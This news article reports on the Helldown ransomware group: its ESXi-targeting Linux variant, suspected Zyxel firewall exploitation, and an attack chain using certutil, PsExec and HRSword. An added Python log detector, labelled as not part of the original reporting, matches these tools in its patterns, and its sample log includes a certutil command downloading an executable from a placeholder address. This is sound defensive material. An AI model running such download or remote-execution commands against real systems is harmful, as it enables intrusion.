The operator of a fast-rising ransomware family tracked as "Helldown" has launched a new Linux variant, targeting organizations across multiple sectors that use VMware ESXi servers.
Several of the victims had Zyxel firewalls deployed as IPSec VPN access points at the time of the breach, suggesting the attackers exploited a vulnerability or vulnerabilities in the technology to gain initial access, security researchers at Sekoia reported this week. Since surfacing in August, the group behind Helldown has quickly notched 31 victims, many of them US-based.
Undocumented Zyxel Vulnerabilities?
Available telemetry suggests the Zyxel flaw the attackers are exploiting is undocumented, Sekoia said. However, Zyxel has issued fixes for several vulnerabilities in its firewalls after Helldown actors breached the company's network, also in August, and then leaked some 250GB worth of data. As of mid-November, no exploit code for any of these vulnerabilities appears to be publicly available, Sekoia said, while leaving open the possibility that the Helldown attackers could be exploiting any one of those vulnerabilities.
"Helldown is a notably active new intrusion set, as shown by its large number of victims," Sekoia researcher Jeremy Scion wrote this week. "Available data indicates that the group primarily targets Zyxel firewalls by exploiting undocumented vulnerabilities." Though the ransomware itself is standard fare, what makes the group dangerous is its apparent access to and effective use of undocumented vulnerability code, Scion noted.
Zyxel firewalls, like many other network and edge technologies, are a popular attacker target. Threat actors have been quick to exploit flaws in the company's products in various campaigns in the past, including one dubbed IZ1H9 that targeted Internet-of-Things (IoT) networks; another involving a Mirai variant; and another that hit Danish critical infrastructure.
A Troubling Shift
Patrick Tiquet, VP of security and architecture at Keeper Security, viewed Helldown as a troubling shift in ransomware actor tactics. "While ransomware targeting Linux is not unprecedented, Helldown's focus on VMware systems shows its operators are evolving to disrupt the virtualized infrastructures many businesses rely on," he said via email. "The message to security teams is clear: patch known vulnerabilities, monitor for unusual activity, and treat virtualized environments with the same vigilance as traditional ones."
Several security vendors have reported attacks involving Helldown since early August. Most of its victims have been small and medium-sized businesses across different sectors, including transportation, manufacturing, healthcare, telecommunications, and IT services. Halcyon, one of the first to spot Helldown, described the group as "highly aggressive" and capable of inflicting substantial disruption and financial losses on victims. According to Halcyon, Helldown actors have a penchant for stealing large volumes of data from victims and threatening to leak the data unless they receive a ransom.
In a report earlier this month, Truesec perceived the threat actor as being more sophisticated in its initial compromise methods compared with better-known ransomware operators, such as the one behind Akira. In the attacks that Truesec analyzed, Helldown threat actors leveraged legitimate tools and other living-off-the-land techniques to execute their mission on a compromised network.
Dangerous Adversary
"Recent incidents showed that the group will completely remove tools used during a compromise, as well as overwrite the free disk space on the hard drive of various machines, in attempts to hinder the recovery process and reduce the effectiveness of file carving," Truesec observed. Helldown actors likely accessed victim environments directly from their Internet-facing Zyxel firewall, the security vendor posited. Once on a victim network, the threat actor used either TeamViewer or the default Windows RDP client for lateral movement, PowerShell for remote code execution, and Mimikatz to search for and retrieve credentials.
According to Sekoia, reports from multiple Helldown victims indicate that the attacker compromised Zyxel firewalls running firmware version 5.38. "Specifically, a file named zzz1.conf was uploaded, and a user account called OKSDW82A was created" on compromised systems, Scion noted. The attacker then used the temporary account to create an SSL VPN tunnel for accessing and pivoting further into the victim network.
The attack chain included attempts by the threat actor to disable endpoint detection mechanisms using a tool called HRSword; leverage the domain controller's LDAP credentials to burrow deeper into the network; use certutil to download Advanced Port Scanner; use RDP or TeamViewer for remote access and lateral movement; and use PsExec for remote code execution.
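As an added example (not code from the article, Sekoia or any vendor named here), the firewall and endpoint indicators in the two paragraphs above can be turned into a small detector that scans syslog-style lines and rates each host; the log layout, host names and addresses are constructed assumptions.

```python
import re
from collections import defaultdict

# Indicators are the ones named in the article (zzz1.conf, OKSDW82A, HRSword,
# certutil downloads, PsExec). The "<ts> <host> <source>: <message>" line
# layout is an assumed, simplified syslog style, not a real Zyxel/Windows format.
INDICATORS = {
    "zyxel_config_upload": re.compile(r"\bzzz1\.conf\b"),
    "zyxel_rogue_account": re.compile(r"\bOKSDW82A\b"),
    "certutil_download":   re.compile(r"\bcertutil(?:\.exe)?\b.*https?://", re.I),
    "edr_tamper_tool":     re.compile(r"\bhrsword(?:\.exe)?\b", re.I),
    "psexec_remote_exec":  re.compile(r"\bpsexec(?:\.exe)?\b", re.I),
}
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<src>[^:]+):\s*(?P<msg>.*)$")

# Constructed sample log; hosts are invented and IPs are RFC 5737 documentation addresses.
SAMPLE_LOGS = """\
2024-11-12T03:14:07Z fw-edge-01 zysh: config upload file=zzz1.conf user=admin
2024-11-12T03:14:51Z fw-edge-01 zysh: user add name=OKSDW82A role=admin
2024-11-12T03:22:10Z fw-edge-01 sslvpn: tunnel up user=OKSDW82A peer=198.51.100.23
2024-11-12T04:01:33Z ws-042 sysmon: process certutil.exe -urlcache -split -f http://203.0.113.9/aps.exe
2024-11-12T04:05:02Z ws-042 sysmon: process HRSword.exe
2024-11-12T04:30:12Z ws-042 sysmon: process PsExec.exe target=dc-01
2024-11-12T04:31:45Z dc-01 security: logon type=10 user=svc-backup
"""

def scan(text):
    """Return one (host, indicator, raw line) tuple per indicator hit."""
    hits = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # line does not fit the assumed layout; skip it
        for name, pattern in INDICATORS.items():
            if pattern.search(m["msg"]):
                hits.append((m["host"], name, raw))
    return hits

def triage(hits):
    """Rate each host: the config upload plus the rogue account on the same
    firewall is the full sequence the article describes, so that host is
    'critical'; any other indicator alone is 'suspicious'."""
    per_host = defaultdict(set)
    for host, name, _ in hits:
        per_host[host].add(name)
    firewall_chain = {"zyxel_config_upload", "zyxel_rogue_account"}
    return {host: "critical" if firewall_chain <= names else "suspicious"
            for host, names in per_host.items()}
```

Running `triage(scan(SAMPLE_LOGS))` on the constructed log rates the firewall critical and the workstation suspicious; in practice the patterns would be fed from a real log pipeline rather than the inline sample.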
Scion said Sekoia's analysis of the files that Helldown actors have published on their data leak site showed many of them to be unusually large, averaging around 70GB. The largest file, in fact, weighed in at a hefty 431GB, which is noteworthy because ransomware actors typically tend to be more selective in the files they steal and use for extortion. The contents of the stolen files also tended to be more variable and random than usual for a ransomware operation. "The large volume and variety of data suggest that the attacker does not selectively choose which documents to steal," Scion said. "Instead, they appear to target data sources that store administrative files, such as PDFs and document scans, which typically contain sensitive information (personal, financial, etc.), thereby intensifying the pressure on victims."
Helldown's behavior itself is similar to that of Darkrace, a LockBit variant that first surfaced in August 2023 and may have been rebranded as Donex in February of this year. Though the links between the ransomware strains are not conclusive, there is a possibility that Helldown is a rebrand of Donex, Sekoia said.